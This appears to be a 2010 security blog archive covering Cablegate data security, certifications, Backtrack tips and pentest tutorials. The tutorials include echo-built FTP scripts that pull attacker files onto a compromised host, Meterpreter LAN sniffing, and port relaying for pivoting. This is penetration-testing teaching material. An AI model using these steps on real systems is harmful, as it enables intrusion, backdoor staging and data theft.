Tuesday, 30 November 2010

Some thoughts and analysis of the Wikileaks "Cablegate" situation

The current Wikileaks "Cablegate" case is interesting on a variety of IT Security topics, especially around access control, and the effect that Web 2.0 can have on confidential and secret information.

From a data security perspective, I feel that this is a relatively new situation that is catching the US government off-guard. Certainly it is a situation brought to a new level by the internet (and the public's desire to read about political gossip).

I will stay away from the politics, but here are some of my thoughts about the data, and the data security, in brief.

Very worrying for the US Government

This is a very worrying situation for the US Government. Data loss of this magnitude and media interest is unprecedented. I feel that this situation is likely to cause political diplomacy issues for some time to come.

I am sure that US data security will be tightened as a result (so some good will come of it), perhaps with new legislation. Meanwhile, the information contained in the cables is getting front-page coverage in national newspapers worldwide.

The Wikileaks Cablegate data online

Wikileaks have certainly spent a lot of effort making the data available, with multiple mirrored websites.

The data is getting indexed (and cached) by Google, making searching very powerful if you know how to use Google operators.

For Google searching, it is possible to use site-scoped search expressions, and if you know your Google operators, you can combine those with something more focused.
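For example, a site-scoped query along these lines would restrict results to the Cablegate site (the search terms here are purely hypothetical):

```
site:cablegate.wikileaks.org "embassy" confidential
```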

As I said, the data is also being cached by Google (and other search engines), so if the sites were to be taken down, it may still be possible to access the information by clicking on the "cache" links provided by Google.

It is interesting that data never really goes away on the internet. Once it is out there, it is out there; there would be no way of removing all of the instances of the data, no matter how hard someone tried.

Release of information rate, and data-cleansing

The release of new information is rather slow. I suspect this is due to the data-cleansing that Wikileaks are currently doing (they seem to be removing names of individuals from the data before publication, except for names of senior politicians and leaders, though I am not sure what the logic behind that is).

With just over 0.1% of the data currently hosted, and a small dribble of new data each day, I feel that it is going to take a massive amount of effort for Wikileaks to publish the data. They are talking about sanitizing a quarter of a million documents, an enormous task!

I would estimate it will take several years to release all the data at this rate. It's a huge project, and will take considerable time and resources to complete. Meanwhile, news keeps coming with each release, and some of the press have their own copy of the data (Though I think people will get bored of it within 6 months, if Wikileaks lasts that long...)
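As a rough sanity-check of that estimate (the publication rate here is my assumption, a round figure in line with the small dribble of releases so far):

```shell
# ~250,000 cables in total; assume roughly 100 sanitized cables published per day
total=250000
per_day=100
echo "$((total / per_day / 365)) years to release everything at this rate"
```

Integer shell arithmetic gives about 6 years, consistent with the "several years" estimate above.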

Denial of service

I saw a tweet earlier in the week (right after the launch of the Cablegate data) in which Wikileaks reported that their systems were under a distributed denial-of-service (DDoS) attack.

This may be the US Government, or third parties acting on their behalf, or acting completely independently. I am sure this situation will change rapidly over time; such is the nature of DDoS and defenses against it.

The cablegate.wikileaks.org platform

Interestingly, looking at the DNS records, I can see that Wikileaks are currently hosting part of the Cablegate site on Amazon EC2 (one of the mirrors I checked the DNS for resolves to the Seattle Amazon EC2 location). Other servers are currently located in France.

If the US do decide to pull-the-plug on Wikileaks, then I would think it would be relatively straightforward to take down the current platform. Whether this could be classed as "political censorship of the web" is open for debate - but as I said, I will stay away from the politics.

Anyway, I feel it would be easier to take the current platform off-line by political pressure, negotiations with vendors, and legal means than by DDoS.

However, it would likely just pop up somewhere else - such is the nature of the internet. Once the data is out there it will not be deletable.

Also, the small amount of data released so far is easily available via bit-torrent among other file-sharing methods.

Cable data

It seems that the cables are each quite small pieces of data, like telegrams. The cables are very compact and concise, apparently averaging around 1,000 words (around 6K each).

If this is representative of the rest of the data, this would put 250,000 documents at around 1.5GB. However, due to the nature of the data, I would say that it would compress at a good ratio (with Winzip for example), perhaps down to 500MB, so it would easily have fit onto a memory stick, SD card, recordable CD or DVD.
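The back-of-the-envelope arithmetic works out like this (the ~6 KB per cable and a rough 3:1 compression ratio are the assumptions from above):

```shell
# 250,000 cables at ~6 KB each
echo "$((250000 * 6 / 1024)) MB uncompressed"    # ~1.4 GB
# assuming the text compresses at roughly 3:1
echo "$((250000 * 6 / 1024 / 3)) MB compressed"  # ~500 MB
```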

In other words, with today's technology, a quarter of a million cables are surprisingly portable. Perhaps this is how the data was stolen (it has been suggested that a CD-R format was used by Bradley Manning, and that this is where the data came from).

Need to know

Mitigations for this leak should have been better (my opinion). From a data governance perspective, it looks like there has been a huge failure in the application of "least privilege", i.e. the "need to know".

I have seen reports that suggest that up to 1 million US military and law enforcement personnel may potentially have had the level of access required to view some of this data. If true, that is an incredible situation, and it is no surprise that something this damaging has happened.

I doubt this is true, but in any case, access control and data loss prevention seem to have been lacking - I am sure this is currently in urgent review!

Sunday, 28 November 2010

FTP transfers from within a non-interactive shell (Windows and Linux)

This post covers how an attacker can perform FTP file transfers from within a non-interactive shell (for both Windows and Linux target systems).

Please use this information for legitimate penetration testing purposes only.

When a system is compromised by an attacker, it is common to try to initiate a command shell so that the system can be remotely controlled; commands issued, and files uploaded/downloaded.

However, basic non-interactive shells to compromised systems can be rather tricky to use, because it is so easy to make a mistake, run an interactive program, and then lose control of your shell (and connectivity to the compromised host).

This is why I generally prefer to get an SSH or Metasploit Meterpreter session going once I have initially compromised a system. Before an attacker could do this however, they would need to upload or download files from the system, perhaps using FTP, TFTP, SSH or HTTP. Here we look specifically at FTP.

The interactive nature of the FTP console

As the FTP program provides an interactive prompt, it is not straightforward to use from a non-interactive shell. Once you start the FTP command, the FTP console will be stuck waiting for input it can never get.

So how can you use FTP in a non-interactive shell?

In these examples, our attacking system has an FTP server running, hosting our malicious files (in this case, test.txt).

FTP in a non-interactive shell to a Windows system

For a Windows system, this is relatively easy because the Windows version of FTP supports the "-s" option.

This enables an attacker to create a script of FTP commands, and then run that script on the remote system.

The script containing the FTP commands can be put on the remote system by echoing commands to a new file on the system using the shell. This sounds complicated but is literally a question of pasting something like the following blob of commands into the shell:

echo open 21> ftp.txt
echo anonymous>> ftp.txt
echo ftp@ftp.com>> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt

This script file can then be checked with the following command. Each line above has created a line in the script file on the remote system.

type ftp.txt

open 21
anonymous
ftp@ftp.com
bin
get test.txt
bye

This can then be executed on the remote system, like this:

ftp -s:ftp.txt

This works well and is quick and easy in a Windows shell, however, the task is slightly more complex on a Linux system.

FTP in a non-interactive shell to a Linux system

Normally the FTP client on Linux does not have the "-s" option, so we will need to build a shell script to execute the FTP commands. Something like this will work:

echo "#!/bin/sh" >> ftp3.sh
echo "HOST=''" >> ftp3.sh
echo "USER='anonymous'" >> ftp3.sh
echo "PASSWD='blah@blah.com'" >> ftp3.sh
echo "FILE='test.txt'" >> ftp3.sh
echo "" >> ftp3.sh
echo "ftp -n \$HOST <<BLAH " >> ftp3.sh
echo "quote USER \$USER" >> ftp3.sh
echo "quote PASS \$PASSWD" >> ftp3.sh
echo "bin" >> ftp3.sh
echo "get \$FILE" >> ftp3.sh
echo "quit" >> ftp3.sh
echo "BLAH" >> ftp3.sh
echo "exit 0" >> ftp3.sh

When pasted into a non-interactive shell, the above commands will produce a script file, "ftp3.sh", on the remote victim.


#!/bin/sh
HOST=''
USER='anonymous'
PASSWD='blah@blah.com'
FILE='test.txt'

ftp -n $HOST <<BLAH
quote USER $USER
quote PASS $PASSWD
bin
get $FILE
quit
BLAH
exit 0

To check, and then run, this script, simply execute the following commands:

cat ftp3.sh
chmod 777 ftp3.sh
./ftp3.sh

...and this will use FTP to download our test file to the target system.

Using this technique it would be relatively easy to put additional files on the victim system, such as connectivity tools, privilege-escalation exploits, and back-doors, and also to copy files from the victim system using the same method (with a put rather than a get).

Adding the "echo"s to your own scripts

So, say you have some commands you want to put onto the remote system as a script. It would be a bit of a pain to manually add all those "echo"s to each line, so here is an easy way to add the prepended "echo", and the appended ">> file.txt" to each line.

cat ftp2.sh | sed 's/^/echo "/' | sed 's/$/" >> ftp3.sh/' | sed 's/\$/\\\$/'> ftpecho.txt

(This command would be used on the attacking system, to prepare the blob of echo commands you want to paste into the non-interactive shell. It also helps protect the $ character which was used in the Linux script above for shell-script variables).
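To see what the pipeline does, here is a single example line passed through the same three sed commands (with the final file redirection removed so the result is printed):

```shell
echo 'quote USER $USER' \
  | sed 's/^/echo "/' \
  | sed 's/$/" >> ftp3.sh/' \
  | sed 's/\$/\\\$/'
```

This prints `echo "quote USER \$USER" >> ftp3.sh` - exactly the form of line used to build the script above. (Note that without the `g` flag, only the first `$` on each line is escaped, which is fine here, as each line of the FTP script contains at most one variable.)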

Saturday, 27 November 2010

Metasploit: Using the Meterpreter sniffer extension to collect remote network traffic

Once an attacker has gained a foothold by compromising an initial host, one of the first things he needs to do is some basic host and network reconnaissance, in order to see "where he is" and "what he can do next".

One of the techniques that could be used is passive network reconnaissance, i.e. packet-sniffing to "listen" on the victim's LAN for interesting traffic. Here we explore how to use the Metasploit Meterpreter sniffer extension.

Please remember to use these techniques only for legitimate penetration testing, not for malicious purposes. Every action you take has consequences, and you will be heir to the results of your actions.

Broadcast traffic

Several protocols broadcast interesting traffic, and capturing internal LAN traffic can be very useful to an external attacker, assisting in information gathering and in compromising further systems in the "soft underbelly" of the internal LAN.

You can find out a lot about a network by running a network packet sniffer such as Wireshark, tshark or tcpdump. However, an external attacker will likely want to keep a low profile, so installing an application where one did not previously exist is not a wise idea.

Using the Metasploit Meterpreter sniffer extension means that no additional software is installed, no files are written to disk; everything is stored in memory, and all communications between the attacker and victim are encrypted. (This makes intrusion detection and forensic analysis rather difficult!)

Let's take it as read that the initial host has already been compromised, and pick up from there. We can load the Meterpreter sniffer extension as follows

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help


Sniffer Commands

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

...we can then examine what interfaces we have on the remote victim system. This system has two interfaces (which is interesting in itself) and we go ahead and start the sniffer on the first interface:

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)

During the capture, we can check the progress of the collection by issuing a sniffer_stats command:

meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
        bytes: 32178
        packets: 211

...and then dump some traffic:

meterpreter > sniffer_dump 1
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 1 test1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 910 packets (137240 bytes)
[*] Downloaded 100% (137240/137240)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1.pcap
meterpreter > lpwd
meterpreter > sniffer_dump 1 test1b.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 4609 packets (787199 bytes)
[*] Downloaded 066% (524288/787199)...
[*] Downloaded 100% (787199/787199)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1b.pcap

So, we have downloaded a couple of captures to our /root directory. Let's try the other interface, to see if there is any data there also:

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 18 packets (3924 bytes)
[*] Downloaded 100% (3924/3924)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2.pcap
meterpreter > sniffer_dump 2 test2b.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 296 packets (57775 bytes)
[*] Downloaded 100% (57775/57775)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2b.pcap

Capturing the data didn't take long at all, as it is a very easy process. Now that we have our pcap network-capture files, we can examine them locally, at our leisure, on the attacking system. This can be done with a nice graphical tool like Wireshark, filtering the traffic to see what we can learn about the remote victim network.

Here we filter Netbios/SMB broadcast traffic to see what systems we can see on the remote network. This is especially good for finding live Windows systems (which are rather noisy on a LAN)

Other filters could be applied to other broadcast traffic such as; address resolution (ARP, RARP), router discovery, routing protocol advertisements, DHCP, AppleTalk, and other broadcast services, such as file and print.
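As an illustration, Wireshark display filters along these lines could be used on the captured pcap files (these are standard Wireshark dissector names; note that in Wireshark of this era the DHCP dissector is named bootp):

```
nbns || browser    (NetBIOS name service and browser announcements)
arp                (address resolution broadcasts)
bootp              (DHCP traffic)
```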

Using these methods, we can gather a list of live IP addresses, address ranges, and machine types, and all this information can be collected before we even start actively scanning the remote network. This keeps a very low profile for targeted attacks.


Once a single system is compromised, it is only a short time before an attacker can gather enough local information to "pivot" and extend the attack to other local systems.

In secure environments, it is vitally important that every host is secured. This includes virtual hosts and test systems, as these could also be used as a bridgehead to silently sniff, or attack, other systems on the internal LAN.

Also, it is important that there is sufficient network segmentation, internal firewalls and limiting of broadcast traffic, to help minimise the damage in the case of a single compromised system.

Backtrack 4 tips: KDE Konsole tabs

When working with Backtrack 4, it is common to have multiple shells open (I do this all the time)

You may want one for a Metasploit console, one for a Python shell, one for generating some shellcode, one for a reverse-shell listener, port redirection, tcpdump/tshark etc. (Well, this is how I work anyway.)

Here is a top tip for managing your many shells.

KDE Konsole tabs

KDE Konsole lets you have tabbed shells (so use them well). Tabs are displayed along the bottom of the window (or the top if you prefer).

To work efficiently with several concurrent shells:
  1. Open a few Konsole tabs in the same window by clicking on the new tab window (bottom left button)
  2. Quickly label your tabs (Ctrl + Alt + S) and enter a name (It only takes a few seconds, and saves hunting for the right shell!)
  3. To scroll between shell tabs use Shift + arrow keys
  4. To move your shell tabs around, use Ctrl + shift + arrow keys
  5. Add more shells (Ctrl + shift + N) and label them as you need them
  6. Exit the ones you don't need any more, with the button, bottom right (no shortcut for this which prevents mistakes!)

I find this makes managing many shells a lot easier. Rather than have lots of windows open, you can see what you have open all in one place and "Shift-arrow" between them, and then "Alt-tab" to your other applications and back. (The keyboard is a lot quicker than a mouse ;o)

I can easily and quickly manage 10 to 15 shells at once with these methods - that's probably as many as I have ever needed.

Switching desktops

I often use more than one desktop. Maybe I have some web-browsing on one screen, course material I am reviewing on another, and an exploit-development setup going on a third.

If you want to fast-switch between desktops in KDE, then the keyboard shortcut is "Ctrl-F1", for the first screen, "Ctrl-F2" for the second, etc...

(took me a while to find that one, but it is pretty handy, I was used to "Ctrl-ArrowKeys" in Gnome)

Tuesday, 23 November 2010

Backtrack 4 R2 released - my first upgrades and use of it today

I have been playing around with the latest release of Backtrack (Version 4 R2, which was released on Friday) for most of today.

Backtrack is the world's best Linux distribution for Ethical Hacking and Penetration Testing, with hundreds of tools built in and configured ready to go.

The latest distribution can be downloaded from here, and this is a screenshot from one of the systems I upgraded this morning, from a DVD ISO image I cut with Brasero.

This is a Dell Mini10 system, which can be a bit fussy with drivers etc., but everything worked fine out of the box. Even the boot-splash works this time (using the "fix-splash800" command).

For my other test system I used the alternative method to get to R2, using the following command.

apt-get update && apt-get dist-upgrade

This was a pretty quick process, and apart from my Firefox shortcuts disappearing, pretty seamless.

I've been using these systems all day and haven't found any issues yet, so all good so far.

Monday, 22 November 2010

Using winrelay or fpipe for port redirection via a Windows host

When attacking networks in a pentest, it is sometimes useful to be able to redirect TCP or UDP traffic via an intermediary system.

This may be to obfuscate the source of the attack, or perhaps because the victim host (IP address and port combination) is not directly accessible from the attacking machine.

This is commonly used in pivoting, i.e. attacking an initial host, and then using that compromised system to attack other systems on the network which were not initially accessible.

Here we look at two Windows command-line tools which can be used for port redirection, winrelay and fpipe, and test them both.

These techniques should only be used on your own test systems, or where you have express permission to do penetration testing.

winrelay from ntsecurity.nu

This tool can be downloaded here, and there are various options.

Let's look at an example:
The command below would be run on the intermediary system. The victim system in this case is on port 80. 

C:\>winrelay.exe -lip -lp 81 -dip -dp 80 -proto tcp

WinRelay 2.0 - (c) 2002-2003, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
             - http://ntsecurity.nu/toolbox/winrelay/

This can be tested easily by using netcat and typing a simple HTTP GET request from the attacking system. For example

nc -nvv 81
(UNKNOWN) [] 81 (?) open

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 13:05:55 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
Last-Modified: Mon, 22 Nov 2010 09:01:37 GMT
ETag: "259f4a-9-495a080ea7e40"
Accept-Ranges: bytes
Content-Length: 9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

sent 17, rcvd 306

So that worked fine, but winrelay doesn't log any connections to the screen, so there is not much to see on the intermediary system.

In my testing I also tried using wfuzz to brute force some common webserver file locations on my victim system through the relay. It worked well.

Fpipe.exe from foundstone

This tool can be downloaded here and, again, there are various options, so we will do a similar test to the one above:

C:\Documents and Settings\Administrator\Desktop>fpipe -l 82 -c 512 -r 80
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.

Pipe connected:
   In: -->
  Out:  -->
Pipe connected:
   In: -->
  Out:  -->

As you can see, Fpipe logs connections to the screen, so there is more to see, and the HTTP GET request test from the attacking system (below) works as expected.

nc -nvv 82
(UNKNOWN) [] 82 (?) open
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 13:14:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
Last-Modified: Mon, 22 Nov 2010 09:01:37 GMT
ETag: "259f4a-9-495a080ea7e40"
Accept-Ranges: bytes
Content-Length: 9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

 sent 17, rcvd 306

However, I had difficulty getting the web brute-force attack to work through fpipe. I will have to take a look with Wireshark when I have more time, to see what was going wrong...

Saturday, 20 November 2010

Adobe PDF Reader X; The world's most dangerous desktop application gets a fix

Let's face it; the security record of Adobe has not been good over the past few years, with an increasing number of exploits for Adobe products available in the wild.

These have frequently made network security professionals' jobs difficult, with several 0-day PDF vulnerabilities meaning that attackers could easily penetrate network defenses using a client-side attack, by sending a malicious PDF document in an email or URL, for example.

The difficulty of blocking these threats

These attacks have been very difficult to do anything about, especially as the malicious documents could be specially crafted as part of a sophisticated spear-phishing attack, with uniquely created or encoded payloads. This is a lot easier than it sounds, if you have the knowledge, and there is no way that a signature-based anti-virus tool would have been able to stop such targeted attacks.

Also, as usage of PDF documents is ubiquitous in the commercial world, there was no way that system administrators could justify blocking all PDFs at the boundary.

A solution

Thankfully Adobe Reader X is here, which uses sandbox technology to isolate threats in PDF documents. It may take a while before most enterprises deploy this software to all of their computer systems; meanwhile the door is still open for attackers. (I am sure there are more vulnerabilities still to be discovered in older versions of Adobe Reader.)

So, if you are a security manager or sysadmin, and are keen to secure your network from this type of attack, I suggest you put a plan together to roll this out to all of your desktops and laptops, as soon as you can.

Pentesting with Backtrack and the OSCP certification vs more theoretical courses

I am a firm believer that IT Security certification should have a big element of practical and real-world training and testing.

Having studied and passed the CISSP and CISM certifications, I can speak from experience that these don't really teach someone how to defend a company from malicious attack, nor do they cover any detail of the techniques that modern attackers will use to penetrate networks.

It looks to me like CISSP, CISM, and even CEH (Certified Ethical Hacker) are a class of exam that teaches "information" rather than "knowledge". I feel that true knowledge comes from real experience, and the practical application of information and techniques.

I am not knocking CISSP, CISM, or CEH; these certifications are great, and give a very good background in IT Security from either a management or technical perspective. In addition, these certifications require you to submit proof of a level of work experience in IT Security.

What I am saying, is that I feel security experts need real world "offensive" experience to truly understand threats. I also feel that it is important for exams to prove practical skills, which is why I would recommend the Offensive Security courses.

A comparison: theoretical vs practical exams

CISSP is a 6 hour exam of multiple choice questions. Read the question (several times) and then tick box A, B, C or D - for 6 hours.

It's a tough certification, and some of the questions are worded in an awkward way. It covers an extremely broad field of IT Security, so it proves you can memorize and recall lots of information, but I feel it does not prove what you can do, or what you truly know.

Compare that to an exam like OSWP (which I passed earlier this year), in which you have 4 hours to break into several secured wireless access points, and write a report to prove what you found and how. It's a different ball game altogether, and I have to say, it was the most enjoyable exam I have ever taken!

I am currently in the process of studying Pentesting with Backtrack, which culminates in a 24 hour live pentest exam, where you have to break into various systems.

You then have a further 24 hours to write-up and submit your results in a professional penetration test report. (apparently most students stay awake and work for the full 24 hours of the pentest, so it's no walk in the park)

What are the benefits of practical exams?

Clearly, if you are looking to be a real-world penetration tester, there is no better training, or proof that you know what you know, than practical courses and exams like the ones offered by Offensive Security.

If you are a network defender, the techniques learned on a course like PwB are invaluable in teaching you the importance of patch management, secure coding, secure configurations, and the dangers of information leakage and poor passwords. It will also likely improve your general networking know-how for Linux and Windows systems.

For example: in my view, there is nothing like the experience of cracking a file full of password hashes in a few seconds to give you a much better appreciation of what makes passwords secure, and to change your behavior to choose better passwords.

I certainly choose better passwords now ;o)

My recommendation

To be a well-rounded and knowledgeable IT Security professional, you need a mix of training and certifications, some theoretical, and some very practical.

Wednesday, 17 November 2010

Fixing a broken Metasploit 3 install on Backtrack 4

A couple of times over the past year, I have somehow broken Metasploit on a Backtrack 4 install. This can sometimes happen if you lose an internet connection whilst running msfupdate.

When this happens, Metasploit will fail to start, with some nasty error messages basically saying there are file mismatches or missing files. Metasploit will no longer update using msfupdate, and this can be a pain if you have a HDD or USB install of Backtrack.

Here is how to fix this issue by reinstalling MSF from the Metasploit repository (pretty simple: delete the current Metasploit install, and reinstall).

cd /opt/metasploit3
rm -rf msf3
svn co https://www.metasploit.com/svn/framework3/trunk msf3

 (Choose "p" if it asks a question about trusting the repository)

After it has finished updating, you will have a working Metasploit Framework again. Hurrah!

(Note: /pentest/exploits/framework3/ is only a link. The real location for the Metasploit install is in /opt/metasploit3/msf3)

Friday, 12 November 2010

The most popular IT Security qualifications - by demand and salary

Some sites track the appearance of certain criteria in job advertisements, and this can be a good guide as to what employers are looking for in terms of qualifications. So which are the most popular certifications for IT Security?

Let's look at some data from www.itjobswatch.co.uk and compare 7 IT Security qualifications, and 7 generic IT qualifications:

IT Security qualifications
Description | Rank | Rank Change | Average Salary | % Chg | No. | % of total

Interesting things include the high average salary but low demand of CEH, the high demand of CISSP, and low demand for Checkpoint and GIAC. Also, no difference in demand or salary between CCSA and CCSP.

General IT  qualifications
Description | Rank | Rank Change | Average Salary | % Chg | No. | % of total

Interesting things here: a high average salary for ITIL, relatively equal salaries for RHCT and RHCE, and Microsoft qualifications no longer commanding the salaries that they used to.

Though this does not tell much about the job types involved, it does show some interesting results in salary trends and demand.

Sunday, 7 November 2010

The how and why of IT Security - interesting presentations

I've watched a lot of hacker-conference videos recently, and several of them have made a strong impression. I feel that these two together excellently demonstrate current challenges in offensive/defensive IT Security.

Rather than waffle on too much about them I thought I would post links to them together here with a brief introduction.

If you work in IT Security I would suggest it is worth spending a couple of hours to watch these. Take a look.

First the how

Basically, the easiest way to attack most companies is by using social engineering techniques using email and web.

Dave Kennedy (Rel1k) demonstrates how to use the Social Engineering Toolkit

(The back-doored keyboard is interesting, but not as ubiquitous as attacks based around "click here" or "open attachment".)

Anyway, it looks to me that employee IT Security training programs are probably the best solution to some of these issues.

Then the why
A good exploration of the economic motivations for cybercrime from Beau Woods.

Several really interesting points here, especially around the motivations of attackers, the "we're outnumbered" situation, and how the market economy drives business to choose cheap solutions to meet regulatory requirements so that they can continue to do business.

In terms of solutions to the "why" I'm not sure that more regulation will really help improve IT Security budgets over the next few years, nor will it deliver real value. (If more solutions are mandated, this will drive down the budget for each solution to the cheapest - and probably worst.)

Saturday, 6 November 2010

Why ping does not work very well, and hping "the real ping"

(hping "the real ping"... ha ha, excuse the pun ;o)

I have mentioned to a few people, on occasion, that ping doesn't really tell you much about the availability of the services you may be interested in troubleshooting.

When I have explained this in the past, I don't think everyone understood what I was saying (some detailed networking knowledge is required to understand the issues), so here is an attempt to clarify why "ping" doesn't work very well, and to offer a better solution.

Ping may (or may not) tell you whether there is some level of network connectivity between source and destination, and it can be very useful in a LAN environment where there are no firewalls.

However, it is not service-focused and can be very misleading, especially for internet service troubleshooting where firewalls are involved.

1) Just because a host does not respond to ping, does not mean that there is a problem
  • ICMP packets (used by the traditional ping command) are often blocked at firewalls as a recommended security measure. Blocking them hinders malicious network reconnaissance and some denial-of-service attacks, such as ping-flooding and the "ping of death"

2) Just because a host does respond to ping, does not mean that everything is working fine
  • Most services run on specific TCP or UDP ports. ICMP is a different protocol altogether, so a ping reply proves nothing about whether the service you are troubleshooting is available and responding
  • Even if the server is up and the service is running, that does not mean you have the network access needed to reach it (a firewall could be blocking the relevant ports/protocols) - so how can you test that?
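To illustrate the point, here is a minimal Python sketch of a service-level check: instead of sending ICMP, it attempts a real TCP connection to the port the service listens on. (Note this performs a full connect(), unlike hping's half-open SYN probe below, which requires raw sockets and root.) The host and port in the demo are placeholders.

```python
import socket

def tcp_port_open(host, port, timeout=2.0):
    """Attempt a full TCP connection to the service port.

    Unlike an ICMP ping, a successful connect proves the host is up,
    the service port is listening, and no firewall is blocking the path.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    # Self-contained demo: check a throwaway local listener rather
    # than a real webserver.
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))   # port 0 = let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    print(tcp_port_open("127.0.0.1", port))  # a listener exists here
    srv.close()
```

A ping to the same host would tell you none of this: the reply (or lack of one) says nothing about the TCP service itself.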

How to use hping

hping3 is far more advanced than the ping command, is available for various platforms (http://wiki.hping.org/download), and offers many options.

There is quite an extensive set of options, as shown in the help output:

hping3 --help
usage: hping3 host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood      sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set dont fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+] destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt       Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send       Send the packet described with APD (see docs/APD.txt)

To show how it works, let's have a look at some simple examples.

1) Suppose you want to check that a webserver is listening on TCP port 80. You can use hping to send a TCP SYN to port 80:

hping3 -p 80 -S hostname

2) Similarly with an SMTP server:

hping3 -p 25 -S hostname

Let's look at what happens in Wireshark:

Basically hping is sending a series of TCP SYN packets and receiving SYN/ACK replies (but not completing the three-way handshake with a final ACK). So we can see that the server is listening on that port and willing to accept a TCP connection.

Other uses for hping

hping3 has extensive uses for IT Security testing. Here is one example: using hping as a port scanner.

hping3 -p ++1 -S hostname
HPING (wlan0 S set, 40 headers + 0 data bytes
len=44 ip= ttl=64 id=26293 sport=21 flags=SA seq=20 win=4096 rtt=2.1 ms
len=44 ip= ttl=64 id=26308 sport=23 flags=SA seq=22 win=4096 rtt=2.0 ms
len=44 ip= ttl=64 id=26654 sport=80 flags=SA seq=79 win=4096 rtt=1.9 ms

Here we can see the ++1 option incrementing the destination port with each probe, and from the SYN/ACK (flags=SA) results that this system is responding on ports 21, 23, and 80 (FTP, Telnet and HTTP).
